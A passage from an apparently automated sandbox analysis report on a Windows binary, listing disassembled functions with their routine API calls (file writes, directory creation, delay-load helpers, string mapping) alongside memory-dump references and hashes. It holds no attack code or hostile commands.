                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 2C$PDu<C
                                                              • API String ID: 1269201914-410691178
                                                              • Opcode ID: 90014e47a81da887f135490a6d5de26502362cbf61248a8ed920a75db5f66fa6
                                                              • Instruction ID: 2f4dfb73aac2e43445e1b170e1ad40acda20ee17d0506836baa5bd5545c8feaf
                                                              • Opcode Fuzzy Hash: 90014e47a81da887f135490a6d5de26502362cbf61248a8ed920a75db5f66fa6
                                                              • Instruction Fuzzy Hash: 1BB012C165A100BD3108714B1C02E3F010CC0CAF1E730A42FF814C10C1E84C0D45193E
                                                              Function 00429F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0042D343,00000001,?,?,?,00000000,0043551D,?,?,?), ref: 00429F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0043551D,?,?,?,?,?,00434FC7,?), ref: 00429FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0042D343,00000001,?,?), ref: 0042A011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              • Opcode ID: dec760a852f27d62ff42dd9f8aa65a7f8eb0650c180a851bc50f330a431c990d
                                                              • Instruction ID: 808cc98f88d3d8a942bfc9087e21e35bf917304ce6bf90864d6fb2a1b72ad7c9
                                                              • Opcode Fuzzy Hash: dec760a852f27d62ff42dd9f8aa65a7f8eb0650c180a851bc50f330a431c990d
                                                              • Instruction Fuzzy Hash: 0E31D031304325AFDB14CF20E918B6FB7A5EF84715F44491EF94197290CB79AD48CBAA
                                                              Function 0042A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042C27E: _wcslen.LIBCMT ref: 0042C284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A30C
                                                              • GetLastError.KERNEL32(?,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: a0bd6bb9f1de0d6b0a8c731950d6d5ecd1a8ee8593aa474097e0a6574744677c
                                                              • Instruction ID: c89928c6294c205f01d388a18e52b564cccdce12b8856c18b3b16b5ba6ad30d4
                                                              • Opcode Fuzzy Hash: a0bd6bb9f1de0d6b0a8c731950d6d5ecd1a8ee8593aa474097e0a6574744677c
                                                              • Instruction Fuzzy Hash: FA0196217003309BDF21EB766D49BAE27489F09789F84445AFD01E6281DB5CDE91C6BE
                                                              Function 0044B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044B8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 767a73fdd4dcb3bab941fee4ae223c5a8da38ca09bba976a08d73bf022088022
                                                              • Instruction ID: 799cb24f0cd39ef476cd4e3d1d49731f8a03ee996d47d5febe1750d0127f9e01
                                                              • Opcode Fuzzy Hash: 767a73fdd4dcb3bab941fee4ae223c5a8da38ca09bba976a08d73bf022088022
                                                              • Instruction Fuzzy Hash: 2A41FCB050438C9EEB218E258C84BF6BBB9DB55304F1404EED5DA86242D339EA45DFA5
                                                              Function 0044AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0044AFDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: 6d607926823ffaba69582cbdbf2f4f3f6f5a7f4748bb9a0eb1f28c97bf76cda5
                                                              • Instruction ID: df6e4f9d99da9729da3a24981f46ea189d829e1ab3ee12875b66b94363b1019e
                                                              • Opcode Fuzzy Hash: 6d607926823ffaba69582cbdbf2f4f3f6f5a7f4748bb9a0eb1f28c97bf76cda5
                                                              • Instruction Fuzzy Hash: 93014C72544209BBDF029F91DC01DEE7F66EF0C755F014166FE1425161C63ACA31EB99
                                                              Function 0044AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0044A56F), ref: 0044AF55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: db15dafac2aae3f0a0134832ef3f835dd17777628ef36803d8622889bcd131ad
                                                              • Instruction ID: 1162d8b1a09ce964b5621dbdc4b3989834a52f263ee61c57373aa1176ae54602
                                                              • Opcode Fuzzy Hash: db15dafac2aae3f0a0134832ef3f835dd17777628ef36803d8622889bcd131ad
                                                              • Instruction Fuzzy Hash: 5BF0B471685208BBDB029F51DC02D9EBF61EF08752B00407AFC0856261DA359E24DB9E
                                                              Function 0044ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 6947a7244ecdcfa55025b66580f6b38b6afacba2552937e048b4fabec361b19b
                                                              • Instruction ID: f18b90cd40fdfc04445df0299cd3db554aa98458557e0321ff44413cc0f6f1ee
                                                              • Opcode Fuzzy Hash: 6947a7244ecdcfa55025b66580f6b38b6afacba2552937e048b4fabec361b19b
                                                              • Instruction Fuzzy Hash: 05E05CB0AC030877E3019F25DC02A6EB755DB04723B0000BBFC0053241CD389F1046EE
                                                              Function 0043E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 1b086cbb2eedc7674cc9178a9a8b7bd522444e1f0519dad5cebb84b148049941
                                                              • Instruction ID: 6c83740879f17cce4d899331db96a359bb714c622bff005f9f99485ec95ef5a2
                                                              • Opcode Fuzzy Hash: 1b086cbb2eedc7674cc9178a9a8b7bd522444e1f0519dad5cebb84b148049941
                                                              • Instruction Fuzzy Hash: B6B0929525A200FC210821871C46C3B010CC089F16730982FBC01C04C1E848AC05083A
                                                              Function 0043E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 9e2563b7c07d21af87a1ad7ff90112cfd477f30443bc24780487dac47d2a63c6
                                                              • Instruction ID: 68f3f058e9c601761cb7c92809ca6b9d6649e0ec7b0e73840a469a363d8be30c
                                                              • Opcode Fuzzy Hash: 9e2563b7c07d21af87a1ad7ff90112cfd477f30443bc24780487dac47d2a63c6
                                                              • Instruction Fuzzy Hash: F8B0929525A204EC3108618B1846D3B010CC088F16730942FB805C10C1A848AC050A3A
                                                              Function 0043E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: cdbf1268c8e294c5bc2942ce118b1cc9cd57358563e444c64b1882985a99ae68
                                                              • Instruction ID: 0ae7250c04125bbd4bab88ebbcc761d90c85c0922e24b7606c8e4e331dc3912e
                                                              • Opcode Fuzzy Hash: cdbf1268c8e294c5bc2942ce118b1cc9cd57358563e444c64b1882985a99ae68
                                                              • Instruction Fuzzy Hash: 21B0929125A100EC210866471806D3B010CC089F16730D42FBC05C11C1E848A809093A
                                                              Function 0043E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: f1b64a246d7d52574e9c230c3c12c40f52b335e6279256cbdc1574afe7175d74
                                                              • Instruction ID: dec129d6c4ee1f7584f620ac67e7b1387dcfbbe5f9b06da469813cc047bd71d9
                                                              • Opcode Fuzzy Hash: f1b64a246d7d52574e9c230c3c12c40f52b335e6279256cbdc1574afe7175d74
                                                              • Instruction Fuzzy Hash: 15B0929125A140EC2108614B1806D3B010DC089F16B30942FBC05C10C1E84CA805093A
                                                              Function 0043E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 5776c5fe3119546a36552364f983c48540b5509bed0f862a44726da36f575821
                                                              • Instruction ID: ac88868aabee6e590d503d1ac060768b8f296f20e0a4863fb2e70e70bd96dcd3
                                                              • Opcode Fuzzy Hash: 5776c5fe3119546a36552364f983c48540b5509bed0f862a44726da36f575821
                                                              • Instruction Fuzzy Hash: 1FB012E125B240FC3148724B5C06D3B010DC0C8F16B30953FFC05C10C1E84CAC490A3E
                                                              Function 0043E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 8f5b9381b7bd28cb05c4024d4e75928413ee9f42eaf404150fe22dac5b253cae
                                                              • Instruction ID: c98dd202fa4bef690f51cda748d5a506723a71b585123c80a4561581cc428192
                                                              • Opcode Fuzzy Hash: 8f5b9381b7bd28cb05c4024d4e75928413ee9f42eaf404150fe22dac5b253cae
                                                              • Instruction Fuzzy Hash: 30B012D126B140FC3108718B1C06D3B014DC4C8F16B30943FFC06C10C1E84CAC05093E
                                                              Function 0043E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 215ded273ddd5a607f14b36a2776c64a3924121515ca99abc283ba609e3ab2dd
                                                              • Instruction ID: 8c9a1bba32f90f7518695eb6cb27f85185be367bae403330b717c0c09ffe51d7
                                                              • Opcode Fuzzy Hash: 215ded273ddd5a607f14b36a2776c64a3924121515ca99abc283ba609e3ab2dd
                                                              • Instruction Fuzzy Hash: A2B0929125A100EC2108A1571806D3B014CC089F16730942FBC05C10C1E948A805093A
                                                              Function 0043E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: f55e4e42e8c8f512ef9896a714e602d9b494a846c758ca2ede25f44f5fabc058
                                                              • Instruction ID: 80eb3f6cbdf27fcb152bed3492f855fcc88f343f2df2757af6e8600bd7c897c9
                                                              • Opcode Fuzzy Hash: f55e4e42e8c8f512ef9896a714e602d9b494a846c758ca2ede25f44f5fabc058
                                                              • Instruction Fuzzy Hash: 4BB0929125A240FC214862475806D3B010CC088F16730952FB815C11C1A848A8490A3A
                                                              Function 0043E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
